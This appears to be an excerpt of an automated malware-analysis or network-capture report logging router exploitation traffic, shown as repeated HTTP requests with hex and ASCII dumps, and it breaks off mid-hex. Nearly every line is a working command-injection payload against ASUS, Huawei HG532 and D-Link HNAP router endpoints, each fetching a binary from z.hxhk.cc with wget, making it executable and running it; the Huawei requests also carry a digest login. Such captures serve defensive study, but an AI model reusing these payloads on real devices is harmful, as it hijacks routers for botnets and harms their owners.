3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 